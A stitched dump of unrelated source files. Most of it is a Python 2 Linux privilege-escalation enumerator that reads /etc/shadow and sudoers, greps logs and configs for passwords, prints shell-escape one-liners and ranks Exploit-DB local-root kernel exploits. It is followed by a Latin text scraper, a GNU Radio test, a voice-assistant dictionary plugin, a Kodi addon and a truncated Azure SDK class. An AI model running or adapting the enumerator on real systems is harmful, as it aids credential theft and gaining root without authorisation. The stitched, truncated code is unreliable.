"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the avaialable tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
| gpl-3.0 | 6,533,771,653,508,868,000 | 66.601078 | 248 | 0.614872 | false |
oudalab/phyllo | phyllo/extractors/regula_ad_monachoDB.py | 1 | 3765 | import sqlite3
import urllib
import re
from urllib.request import urlopen
from bs4 import BeautifulSoup
# several names in the <pagehead> but not sure what to put as an author name
def main():
# The collection URL below.
collURL = 'http://www.thelatinlibrary.com/regula.html'
collOpen = urllib.request.urlopen(collURL)
collSOUP = BeautifulSoup(collOpen, 'html5lib')
author = "unknown"
colltitle = collSOUP.title.string.strip()
date = "no date found"
textsURL = [collURL]
with sqlite3.connect('texts.db') as db:
c = db.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS texts (id INTEGER PRIMARY KEY, title TEXT, book TEXT,'
' language TEXT, author TEXT, date TEXT, chapter TEXT, verse TEXT, passage TEXT,'
' link TEXT, documentType TEXT)')
c.execute("DELETE FROM texts WHERE title = 'REGULA AD MONACHOS I'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS II.'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS III.'")
c.execute("DELETE FROM texts WHERE title = 'REGULA ORIENTALIS\nEX PATRUM ORIENTALIUM REGULIS COLLECTA'")
for url in textsURL:
chapter = "Preface"
verse = 0
title = "REGULA AD MONACHOS I"
openurl = urllib.request.urlopen(url)
textsoup = BeautifulSoup(openurl, 'html5lib')
getp = textsoup.find_all('p')
for p in getp:
# make sure it's not a paragraph without the main text
try:
if p['class'][0].lower() in ['border', 'pagehead', 'shortborder', 'smallborder', 'margin',
'internal_navigation']: # these are not part of the main t
continue
except:
pass
verses = []
text = p.get_text()
text = text.strip()
if p.find('b') is not None:
if text.startswith("SS.") or text.startswith("REGULA"):
# this is the title of a new work
title = text
chapter = -1
continue
else:
if text.startswith("CAPUT"):
chapter = text
print(chapter)
verse = 0
continue
else:
chapter = chapter + ": " + text
continue
if title == "REGULA AD MONACHOS I":
verses.append(text)
elif text.startswith("PRAEFATIO"):
chapter = text
verse = 0
continue
elif re.match('[IVXL]+\.', text):
chapter = text.split(" ")[0].strip()
print(chapter)
verse = 0
text = text.replace(chapter, '')
verses.append(text)
else:
verses.append(text)
for v in verses:
if v.startswith('Christian'):
continue
if v is None or v == '' or v.isspace():
continue
# verse number assignment.
verse += 1
c.execute("INSERT INTO texts VALUES (?,?,?,?,?,?,?, ?, ?, ?, ?)",
(None, colltitle, title, 'Latin', author, date, chapter,
verse, v, url, 'prose'))
if __name__ == '__main__':
main()
| apache-2.0 | 730,117,628,980,353,400 | 36.277228 | 112 | 0.468526 | false |
no-net/gr-winelo | python/qa_winelo_mpc_channel_cc.py | 1 | 2465 | #!/usr/bin/env python
#
# Copyright 2012 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
#
from gnuradio import gr, gr_unittest
import winelo_swig
class qa_mpc_channel_cc(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_001(self):
src_data = (1, 2, 3, 4, 5)
src_gauss_ch1 = (2, 2, 1, 1, 2)
expected_result = (2, 4, 3, 4, 10)
src0 = gr.vector_source_c(src_data)
src1 = gr.vector_source_c(src_gauss_ch1)
mpc_channel = winelo_swig.mpc_channel_cc((0,), (1,))
sink = gr.vector_sink_c()
# set up fg
self.tb.connect(src0, (mpc_channel, 0))
self.tb.connect(src1, (mpc_channel, 1))
self.tb.connect(mpc_channel, sink)
self.tb.run()
# check data
result_data = sink.data()
self.assertFloatTuplesAlmostEqual(expected_result, result_data, 6)
def test_002(self):
src_data = (1, 0, 0, 0, 0)
src_gauss_ch1 = (1, 1, 1, 1, 1)
src_gauss_ch2 = (1, 1, 1, 1, 1)
expected_result = (1, 0, 0, 0.707106781, 0)
src0 = gr.vector_source_c(src_data)
src1 = gr.vector_source_c(src_gauss_ch1)
src2 = gr.vector_source_c(src_gauss_ch2)
mpc_channel = winelo_swig.mpc_channel_cc((0, 3), (1, 0.5))
sink = gr.vector_sink_c()
# set up fg
self.tb.connect(src0, (mpc_channel, 0))
self.tb.connect(src1, (mpc_channel, 1))
self.tb.connect(src2, (mpc_channel, 2))
self.tb.connect(mpc_channel, sink)
self.tb.run()
# check data
result_data = sink.data()
self.assertFloatTuplesAlmostEqual(expected_result, result_data, 6)
if __name__ == '__main__':
gr_unittest.main()
| gpl-3.0 | -3,779,461,491,146,289,700 | 32.767123 | 74 | 0.619067 | false |
iamjake648/jasper-dictionary | Define.py | 1 | 1593 | #Written by Jake Schultz
#TODO Add more lang support, limit number of results returned
import re
from urllib2 import Request, urlopen, URLError
import json
WORDS = ["DEFINE","WHAT DOES %S MEAN","DEFINITION", "WHAT IS [A|AN]? %S"]
PRIORITY = 1
def handle(text, mic, profile, recursive=False):
text = re.sub(r"(?i)(define|(what is the\s)?definition of|what does|mean|what is (a|an)?)\b","", text ).strip()
if len(text) != 0:
#Yandex Dictionary API Key
dict_key = profile['keys']['YANDEX_DICT']
#method to get the def
get_def(text,mic,dict_key)
elif not recursive:
mic.say("What word would you like to define?")
handle(mic.activeListen(), mic, profile, True)
def get_def(text,mic,key):
#make a call to the API
request = Request('https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key='+key+'&lang=en-en&text='+text)
try:
response = urlopen(request)
data = json.load(response)
if len(data["def"]) == 0:
mic.say("I could not find a definition for " + str(text))
else:
#get the word type (noun, verb, ect)
word_type = data["def"][0]["pos"]
mic.say("The word is a " + word_type)
defs = data["def"][0]["tr"]
#loop through the definitions
for text in defs:
mic.say(text["text"])
except URLError, e:
mic.say("Unable to reach dictionary API.")
def isValid(text):
return bool(re.search(r'\Define|what does\s(.*?)\smean|Definition|what is\s\w+\b',text, re.IGNORECASE))
| gpl-2.0 | 1,097,689,116,695,614,700 | 34.4 | 118 | 0.603264 | false |
felipenaselva/repo.felipe | plugin.video.uwc/k18.py | 1 | 2513 | '''
Ultimate Whitecream
Copyright (C) 2015 mortael
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib, urllib2, re, cookielib, os.path, sys, socket
import xbmc, xbmcplugin, xbmcgui, xbmcaddon
import utils
#230: k18.Main()
#231: k18.List(url)
#232: k18.Playvid(url, name, download)
#233: k18.Cat(url)
#234: k18.Search(url, keyword)
progress = utils.progress
def Main():
utils.addDir('[COLOR hotpink]Categories[/COLOR]','http://k18.co/',233,'','')
utils.addDir('[COLOR hotpink]Search[/COLOR]','http://k18.co/?s=',234,'','')
List('http://k18.co/page/1/')
xbmcplugin.endOfDirectory(utils.addon_handle)
def List(url):
listhtml = utils.getHtml(url, '')
match = re.compile(r'class="content-list-thumb">\s+<a href="([^"]+)" title="([^"]+)">.*?src="([^"]+)"', re.DOTALL | re.IGNORECASE).findall(listhtml)
for videopage, name, img in match:
name = utils.cleantext(name)
utils.addDownLink(name, videopage, 232, img, '')
try:
nextp=re.compile('next page-numbers" href="([^"]+)">»', re.DOTALL | re.IGNORECASE).findall(listhtml)[0]
utils.addDir('Next Page', nextp, 231,'')
except: pass
xbmcplugin.endOfDirectory(utils.addon_handle)
def Search(url, keyword=None):
searchUrl = url
if not keyword:
utils.searchDir(url, 234)
else:
title = keyword.replace(' ','+')
searchUrl = searchUrl + title
print "Searching URL: " + searchUrl
List(searchUrl)
def Cat(url):
cathtml = utils.getHtml(url, '')
match = re.compile('0" value="([^"]+)">([^<]+)<', re.DOTALL | re.IGNORECASE).findall(cathtml)
for catpage, name in match:
catpage = 'http://k18.co/?cat=' + catpage
utils.addDir(name, catpage, 231, '')
xbmcplugin.endOfDirectory(utils.addon_handle)
def Playvid(url, name, download=None):
utils.PLAYVIDEO(url, name, download)
| gpl-2.0 | -4,485,078,390,973,765,600 | 32.959459 | 152 | 0.655392 | false |
AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/application_gateway_url_path_map.py | 1 | 3397 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayUrlPathMap(SubResource):
"""UrlPathMaps give a url path to the backend mapping information for
PathBasedRouting.
:param id: Resource ID.
:type id: str
:param default_backend_address_pool: Default backend address pool resource
of URL path map.
:type default_backend_address_pool:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_backend_http_settings: Default backend http settings
resource of URL path map.
:type default_backend_http_settings:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_redirect_configuration: Default redirect configuration
resource of URL path map.
:type default_redirect_configuration:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param path_rules: Path rule of URL path map resource.
:type path_rules:
list[~azure.mgmt.network.v2017_09_01.models.ApplicationGatewayPathRule]
:param provisioning_state: Provisioning state of the backend http settings
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
